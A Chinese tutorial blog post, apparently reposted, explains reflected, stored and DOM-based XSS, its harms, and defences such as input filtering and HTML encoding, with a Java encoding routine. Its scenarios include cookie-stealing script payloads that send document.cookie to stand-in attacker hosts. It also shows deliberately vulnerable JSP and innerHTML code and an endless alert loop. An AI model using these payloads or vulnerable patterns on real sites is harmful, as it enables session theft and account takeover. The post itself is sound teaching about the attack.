XSS攻击及防御(简单易懂)

Posted liu_bees

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了XSS攻击及防御(简单易懂)相关的知识,希望对你有一定的参考价值。

一、定义

XSS(Cross Site Scripting),翻译过来就是跨站脚本。指的是在用户浏览器上,在渲染DOM树的时候,执行了不可预期的JS脚本,从而发生了安全问题。

XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。


二、XSS类型

反射型XSS

(你提交的恶意数据成功的实现了XSS,但是仅仅是对你这次访问产生了影响,是非持久型攻击)。

存储型XSS

(你提交的数据成功的实现了XSS,存入了数据库或者写入日志,别人访问这个页面的时候就会自动触发)。

DOM型XSS

是一种基于网页DOM结构的攻击,该攻击特点是中招的人是少数人。


三、XSS场景

场景1、反射型XSS

1、当张三登录xxx.com后,我发现它的页面某些内容是根据url中的一个叫content参数直接显示的,猜测它测页面处理可能是这样,其它语言类似:

<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>
<!DOCTYPEhtmlPUBLIC"-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd">
<html>
    <head>
       <title>XSS测试</title>
    </head>
    <body>
       页面内容:<%=request.getParameter("content")%>
       <!-- 有的页面也常用document.write(' ')输出内容 -->
    </body>
</html>

即页面内容直接回显请求链接的参数值。

2、然后张三从某处知道了阿伟也注册了该网站,并且知道其手机号码/邮箱,

3、然后张三做了一个超链接发给阿伟,超链接地址为:http://www.xxx.com?content=<script>window.open(“www.bbb.com?param=”+document.cookie)</script>

4、当阿伟点击这个链接的时候(假设他已经登录xxx.com),浏览器就会直接打开bbb.com,并且把Tom在xxx.com中的cookie信息发送到bbb.com。

5、bbb.com是张三搭建的网站,当张三的网站接收到该信息时,张三就盗取了阿伟在xxx.com的cookie信息,cookie信息中可能存有登录密码,攻击成功!

6、这个过程中,受害者只有阿伟自己(攻击特点是中招的人是少数人)。当然,最后阿伟夸张三很刑。

反射型XSS特点是:攻击是一次性的,仅对当次访问产生影响。这种攻击经过后端,不经过数据库。在此攻击过程中,数据走向为:浏览器——>后端回显——>浏览器,故称为反射型。

场景2、存储型XSS

1、张三看到网站(假设是CSDN类发布文章的网站)可以发文章,然后发了一篇凉爽网图的文章。

2、文章某处包含了恶意代码,<script>window.open(“www.bbb.com?param=”+document.cookie)</script>,保存文章。

3、这时有缘人(怨种)Tom和Jack看到了这篇文章,点进来就都中招了,他们的cookie信息都发送到了我的服务器上,攻击成功!

4、这个过程中,受害者是多个人。( Stored XSS漏洞危害性更大,危害面更广)

存储型XSS特点是会把攻击者的数据存储在服务器端,攻击行为将伴随着攻击数据一直存在。这种攻击经过后端,经过数据库。在此攻击过程中,数据走向为:浏览器—>后端—>数据库—>后端—>浏览器。

场景3、DOM型XSS

DOM XSS直接通过javascript执行,程序并不会返回后台进行处理

常见于类似JSON转换、翻译等工具区

<script>
    function test() 
        var str = document.getElementById("text").value;
        document.getElementById("t").innerHTML = "<a href='"+str+"' >testLink</a>";
    
</script>
<div id="t" ></div>
<input type="text" id="text" value="" />
<input type="button" id="s" value="write" onclick="test()" />

DOM型XSS特点是不经过后端,通过URL传参触发。在此攻击过程中,数据走向为:URL——>浏览器。


四、常见XSS会出现在什么地方?

重灾区:评论区、留言区、个人信息、订单信息等
针对型:站内信、网页即时通讯、私信、意见反馈
存在风险:搜索框、当前目录、图片属性等

存储型XSS会出现在什么地方?

任何可能插入数据库的地方
比如:用户注册的时候
 	       留言板
           上传文件的文件名
          (管理员可见的)报错信息
         	……

五、反射型XSS、存储型XSS及DOM型XSS的区别

1、被攻击对象的不同

反射型XSS的被攻击对象一般是攻击者去寻找的,比如场景一的张三盗取阿伟的信息,所以这种攻击范围不是特别的广。

存储型XSS是广撒网的方式或者指定的方式,就是攻击者将存储型XSS放在一些有XSS漏洞的网站上,只要有用户访问这个链接就会中招,而攻击者也可以寻找被攻击对象,比如说上面的例子,所以我们可以看出,存储型XSS的危害性更大,范围更广,可以不需要寻找被攻击对象,只要存储型XSS在服务器上就能实施攻击。


六、XSS危害

危害1、信息泄露

  • 盗用cookie,窃取敏感信息(包括但不限于账号密码、个人信息)

危害2、未授权操作

  • 利用iframe、frame、XMLHttpRequest或flash等方式,以(被攻击)用户的身份执行一些管理操作,如发文章、发私信、加好友甚至转账等非法行为

  • 利用可被攻击的域受到其他域信任的特点,以受信任来源的身份请求一些平时不允许的操作,如进行不当的投票活动

危害3、按键记录和钓鱼

  • 记录用户在浏览器的操作
  • 伪造登录框获取账号密码等信息

危害4、影响体验

  • 恶意跳转
  • 无法关闭的弹窗
while(true)alert('你关不掉我!');

七、XSS防御

(未查看整理~)

  • 对用户向服务器提交的信息(URL、关键字、HTTP头、POST数据等)进行检查,仅接受规定长度、适当格式、预期内容,其余的一律过滤。
  • 尽量采用POST而非GET提交表单,任何内容输出到页面之前都必须加以en-code,避免显示出htmltag
  • 对用户提交的信息中的link,检查是否有重定向回本站或不是真的图片等可以操作
  • 输出前,对关键词或关键字符等进行编码转义的操作
    1、使用可以转义处理在页面上显示的文本的函数,如php的htmlentities()或是htmlspecialchars(),Node.js的node-validator
2、strip_tags(),用于过滤输入和输出中的恶意标签
3、header(),用于控制json数据的头部(header("Content-type:application/json"))
4、urlencode(),用于输出处理字符型参数代入页面链接中
5、intval(),用于处理数值型参数输出页面中
  • 做session标记、HTTP头检查,以防功能被第三方网站执行
  • 确定接收到的内容被规范化,仅包含最小最安全的tag(不含JavaScript),去掉对任何远程内容的引用(尤其是样式表和JavaScript),使用httpOnly的cookie,设置httpOnly为true
  • cookie防盗,避免直接在cookie中泄露用户隐私,例如email、密码等;通过使cookie和系统IP绑定来降低cookie泄露后的危险

八、更多知识

XSS攻击及防御

  XSS又称CSS,全称Cross SiteScript,跨站脚本攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当其它用户浏览该网站时,这段HTML代码会自动执行,从而达到攻击的目的。如,盗取用户Cookie、破坏页面结构、重定向到其它网站等。

XSS攻击

       XSS攻击类似于SQL注入攻击,攻击之前,我们先找到一个存在XSS漏洞的网站,XSS漏洞分为两种,一种是DOM Based XSS漏洞,另一种是Stored XSS漏洞。理论上,所有可输入的地方没有对输入数据进行处理的话,都会存在XSS漏洞,漏洞的危害取决于攻击代码的威力,攻击代码也不局限于script。

DOM Based XSS

       DOM Based XSS是一种基于网页DOM结构的攻击,该攻击特点是中招的人是少数人。

       场景一

       当我登录a.com后,我发现它的页面某些内容是根据url中的一个叫content参数直接显示的,猜测它测页面处理可能是这样,其它语言类似: 

<%@ page language="JavacontentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>

<!DOCTYPEhtmlPUBLIC"-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd">

<html>

    <head>

       <title>XSS测试</title>

    </head>

    <body>

       页面内容:<%=request.getParameter("content")%>

    </body>

</html>

      我知道了Tom也注册了该网站,并且知道了他的邮箱(或者其它能接收信息的联系方式),我做一个超链接发给他,超链接地址为:http://www.a.com?content=<script>window.open(“www.b.com?param=”+document.cookie)</script>,当Tom点击这个链接的时候(假设他已经登录a.com),浏览器就会直接打开b.com,并且把Tom在a.com中的cookie信息发送到b.com,b.com是我搭建的网站,当我的网站接收到该信息时,我就盗取了Tom在a.com的cookie信息,cookie信息中可能存有登录密码,攻击成功!这个过程中,受害者只有Tom自己。那当我在浏览器输入a.com?content=<script>alert(“xss”)</script>,浏览器展示页面内容的过程中,就会执行我的脚本,页面输出xss字样,这是攻击了我自己,那我如何攻击别人并且获利呢?

Stored XSS

       Stored XSS是存储式XSS漏洞,由于其攻击代码已经存储到服务器上或者数据库中,所以受害者是很多人。

       场景二

       a.com可以发文章,我登录后在a.com中发布了一篇文章,文章中包含了恶意代码,<script>window.open(“www.b.com?param=”+document.cookie)</script>,保存文章。这时Tom和Jack看到了我发布的文章,当在查看我的文章时就都中招了,他们的cookie信息都发送到了我的服务器上,攻击成功!这个过程中,受害者是多个人。
       Stored XSS漏洞危害性更大,危害面更广。

XSS防御

       我们是在一个矛盾的世界中,有矛就有盾。只要我们的代码中不存在漏洞,攻击者就无从下手,我们要做一个没有缝的蛋。XSS防御有如下方式。

完善的过滤体系

       永远不相信用户的输入。需要对用户的输入进行处理,只允许输入合法的值,其它值一概过滤掉。

Html encode

       假如某些情况下,我们不能对用户数据进行严格的过滤,那我们也需要对标签进行转换。

less-than character (<)

&lt;

greater-than character (>)

&gt;

ampersand character (&)

&amp;

double-quote character (")

&quot;

space character( )

&nbsp;

Any ASCII code character whose code is greater-than or equal to 0x80

&#<number>, where <number> is the ASCII character value.

      比如用户输入:<script>window.location.href=”http://www.baidu.com”;</script>,保存后最终存储的会是:&lt;script&gt;window.location.href=&quot;http://www.baidu.com&quot;&lt;/script&gt;在展现时浏览器会对这些字符转换成文本内容显示,而不是一段可执行的代码。

其它

       下面提供两种Html encode的方法。
  • 使用Apache的commons-lang.jar

    StringEscapeUtils.escapeHtml(str);// 汉字会转换成对应的ASCII码,空格不转换

自己实现转换,只转换部分字符

private static String htmlEncode(char c) {

    switch(c) {

       case ‘&‘:

           return "&amp;";

       case ‘<‘:

           return "&lt;";

       case ‘>‘:

           return "&gt;";

       case ‘"‘:

           return "&quot;";

       case ‘ ‘:

           return "&nbsp;";

       default:

           return c + "";

    }

}

 

/** 对传入的字符串str进行Html encode转换 */

public static String htmlEncode(String str) {

    if (str ==null || str.trim().equals(""))   return str;

    StringBuilder encodeStrBuilder = new StringBuilder();

    for (int i = 0, len = str.length(); i < len; i++) {

       encodeStrBuilder.append(htmlEncode(str.charAt(i)));

    }

    return encodeStrBuilder.toString();

}

以上是关于XSS攻击及防御(简单易懂)的主要内容,如果未能解决你的问题,请参考以下文章

web安全之XSS攻击原理及防范

从零学习安全测试,从XSS漏洞攻击和防御开始

从零学习安全测试,从XSS漏洞攻击和防御开始

XSS攻击原理及防御措施

XSS攻击及防御总结和各平台通关思路

安全测试 - CSRF攻击及防御